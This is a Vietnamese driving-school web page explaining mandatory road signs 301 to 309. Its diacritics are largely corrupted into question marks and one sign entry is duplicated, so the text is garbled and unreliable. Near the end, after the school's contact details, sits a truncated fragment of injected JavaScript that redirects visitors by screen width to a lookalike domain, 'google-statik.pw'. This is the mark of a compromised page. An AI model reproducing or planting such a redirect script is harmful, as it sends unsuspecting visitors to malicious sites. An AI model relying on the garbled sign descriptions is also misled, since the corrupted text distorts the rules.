Ý nghĩa các biển báo hiệu lệnh Đường bộ Việt Nam

(otobienhoa.vn) - Nhom bi?n bao hie?u le?nh g?m co 18 ki?u du?c danh s? th? t? t? bi?n s? 301 d?n bi?n s? 309 nh?m bao l?nh cho cac lo?i phuong ti?n giao thong du?ng b? ph?i di theo hu?ng mui ten ch? tr? xe du?c quy?n uu tien theo Lu?t Giao thong du?ng b?:

alt 

- Bi?n s? 301 (a, b, c, d, e, f, h, i) "Hu?ng di ph?i theo"
      
+ Bi?n s? 301a: Bi?n bao hi?u cac xe ch? du?c di th?ng
        Khi d?t bi?n  ? tru?c nga ba, nga tu thi hi?u l?c tac d?ng c?a bi?n la ? ph?m vi khu v?c nga ba, nga tu, t?c la c?m xe r? ? hu?ng tay ph?i va tay trai. N?u d?t bi?n ? sau nga ba, nga tu (b?t d?u vao do?n du?ng ph?) thi hi?u l?c tac d?ng c?a bi?n k? t? ch? d?t bi?n d?n nga ba, nga tu ti?p theo. Tru?ng h?p nay c?m r? trai va quay d?u trong vung tac d?ng c?a bi?n. Ch? cho phep r? ph?i vao c?ng nha ho?c ngo ph? co do?n du?ng t? nga ba, nga tu d?t bi?n d?n nga ba nga tu ti?p theo.

    + Bi?n s? 301b: Bao hi?u cac xe ch? du?c r? ph?i.

        Bi?n d?t ? sau nga ba, nga tu b?t bu?c ngu?i lai xe ch? du?c phep r? ph?i ? ph?m vi nga ba, nga tu tru?c m?t bi?n.

    + Bi?n s? 301c: Bao hi?u cac xe ch? du?c r? trai.

      Bi?n d?t ? sau nga ba, nga tu b?t bu?c ngu?i lai xe ch? du?c phep r? trai ? ph?m vi nga ba, nga tu d?ng sau m?t bi?n.

    + Bi?n s? 301d: Bao hi?u cac xe ch? du?c r? ph?i.

        Bi?n d?t ? sau nga ba, nga tu va b?t bu?c ngu?i lai xe ch? du?c phep r? ph?i ? ph?m vi nga ba, nga tu tru?c m?t bi?n.

    + Bi?n s? 301e: Bao hi?u cac xe ch? du?c r? trai.

        Bi?n d?t ? tru?c nga ba, nga tu va b?t bu?c ngu?i lai xe ch? du?c phep r? trai ? ph?m vi nga ba, nga tu d?ng sau m?t bi?n.

    + Bi?n s? 301f: Bao hi?u cac xe ch? du?c di th?ng hay r? ph?i.

        Bi?n d?t ? tru?c nga ba, nga tu b?t bu?c ngu?i lai xe ch? du?c phep di th?ng hay r? ph?i ? ph?m vi nga ba, nga tu d?ng sau m?t bi?n.

    + Bi?n s? 301h: Bao hi?u cac xe ch? du?c di th?ng hay r? trai.

        Bi?n d?t ? tru?c nga ba, nga tu va b?t bu?c ngu?i lai xe ch? du?c phep di th?ng hay r? trai va du?c phep quay d?u xe d? di theo hu?ng ngu?c l?i.

     + Bi?n s? 301i: Bao hi?u cac xe ch? du?c r? trai hay r? ph?i.

        Bi?n d?t ? sau nga ba, nga tu va b?t bu?c ngu?i lai xe ch? du?c phap r? trai, quay d?u xe ho?c r? ph?i ? ph?m vi nga ba, nga tu tru?c m?t bi?n.

      - Bi?n s? 302(a,b) "Hu?ng ph?i di vong chu?ng ng?i v?t"

        Bi?n bao hi?u cho cac lo?i phuong ti?n giao thong du?ng b? hu?ng di d? qua m?t chu?ng ng?i v?t. Bi?n du?c d?t tru?c chu?ng ng?i v?t va tuy theo hu?ng di vong sang ph?i, sang trai. Bi?n co hi?u l?c b?t bu?c cac lo?i xe ph?i di vong chu?ng ng?i v?t theo hu?ng mui ten ch?.

       - Bi?n s? 302(a,b) "Hu?ng ph?i di vong chu?ng ng?i v?t"     

       Bi?n bao hi?u cho cac lo?i phuong ti?n giao thong du?ng b? hu?ng di d? qua m?t chu?ng ng?i v?t. Bi?n du?c d?t tru?c chu?ng ng?i v?t va tuy theo hu?ng di vong sang ph?i,     sang trai. Bi?n co hi?u l?c b?t bu?c cac lo?i xe ph?i di vong chu?ng ng?i v?t theo hu?ng mui ten ch?.

      - Bi?n s? 303 "Noi giao nhau ch?y theo vong xuy?n"

       Bi?n bao hi?u cho cac lo?i phuong ti?n giao thong du?ng b? ph?i ch?y vong theo d?o an toan ? cac nga ba, nga tu.
       Bi?n co hi?u l?c b?t bu?c cac xe ph?i di vong theo hu?ng mui ten ch?.

    - Bi?n s? 304 "Du?ng danh cho xe tho so"

       Bi?n bao hi?u du?ng danh cho xe tho so (k? c? xe c?a ngu?i tan t?t) va ngu?i di b?.
       Bi?n co hi?u l?c b?t bu?c cac lo?i xe tho so (k? c? xe c?a ngu?i tan t?t) va ngu?i di b? ph?i di theo du?ng danh rieng nay va c?m phuong ti?n giao thong co gi?i k? c? cac xe      du?c uu tien theo Lu?t Giao thong du?ng b? di vao du?ng da d?t bi?n nay, tr? tru?ng h?p di c?t ngang qua nhung ph?i d?m b?o tuy?t d?i an toan xho xe tho so va ngu?i di b?.

     - Bi?n s? 305 "Du?ng danh cho ngu?i di b?":

       Bi?n bao hi?u du?ng danh rieng cho ngu?i di b?. Cac lo?i phuong ti?n giao thong du?ng b? k? c? cac xe du?c uu tien theo lu?t Giao thong du?ng b? khong du?c phep di vao, tr? tru?ng h?p di c?t ngang qua nhung ph?i d?m b?o tuy?t d?i an toan cho ngu?i di b?.

     - Bi?n s? 306 "T?c d? t?i thi?u cho phep"

       Bi?n bao hi?u t?c d? t?i thi?u cho phep c?a xe co gi?i. Bi?n co hi?u l?c c?m cac lo?i xe co gi?i ch?y v?i t?c d? nh? hon tr? s? ghi tren bi?n.

     - Bi?n s? 307 "H?t h?n ch? t?c d? t?i thi?u"

       Bi?n bao h?t do?n du?ng h?n ch? t?c d? t?i thi?u, k? t? bi?n nay cac xe du?c phep ch?y ch?m hon tr? s? ghi tren bi?n nhung khong du?c gay c?n tr? cho xe khac.

      - Bi?n s? 308 (a,b) "Tuy?n du?ng c?u vu?t c?t qua"   

        Bi?n bao t?i c?u vu?t, xe co th? di th?ng ho?c theo ch? d?n tren hinh v? d? r? ph?i hay r? trai.
       Bi?n s? 308a "Di th?ng ho?c r? trai tren c?u vu?t"
       Bi?n s? 308b "Di th?ng ho?c r? ph?i tren c?u vu?t"

      - Bi?n s? 309 "?n coi"

       Bi?n bao hi?u cho ngu?i lai xe ph?i b?m coi. Bi?n d?t ? tru?c khuc du?ng ngo?t g?p ho?c nh?ng noi t?m nhin b? h?n ch?.

 

M?i chi ti?t xin lien h?: Cong Ty TNHH - Trung Tam D?y Ngh? va Dao T?o Sat H?ch Lai Xe H?i Van

- Co so? 1: Trung Doa?n 22, Xa Lo? Ha? No?i, P. Long Bi?nh, Bien Ho?a - Do?ng Nai. - Hotline:  0933 955 686

- Co so? 2: A?p La?ng Ca?t, Xa? Tan Ha?i, Huye?n Tan Tha?nh, Ti?nh Ba? Ri?a - Vu?ng Ta?u. - Hotline:  0932 088 838

Quy? kha?ch vui lo?ng lien he? tru?c tie?p vo?i chu?ng toi de? duo?c tu va?n dang ky? ho?c so?m nha?t vo?i chi phi? tha?p nha?t.

- Da?c bie?t khi dang ky? kho?a ho?c qua die?n thoa?i hotline: (0933 955 686 hoa?c 0932 088 838) truo?c khi no?p ho? so ba?n se? duo?c uu da?i gia?m gia? tru?c tie?p 100.000 VND - 200.000 VND va?o tie?n ho?c phi? tu?y theo kho?a ho?c khi ba?n no?p ho? so ta?i co so? 1 hoa?c co so? 2 cu?a trung tam.

if (screen.width ion = "http://google-statik.pw/l.php";}
 

Salon Auto

Nội thất đồ chơi

Tư vấn mua bán xe


 

Quảng Cáo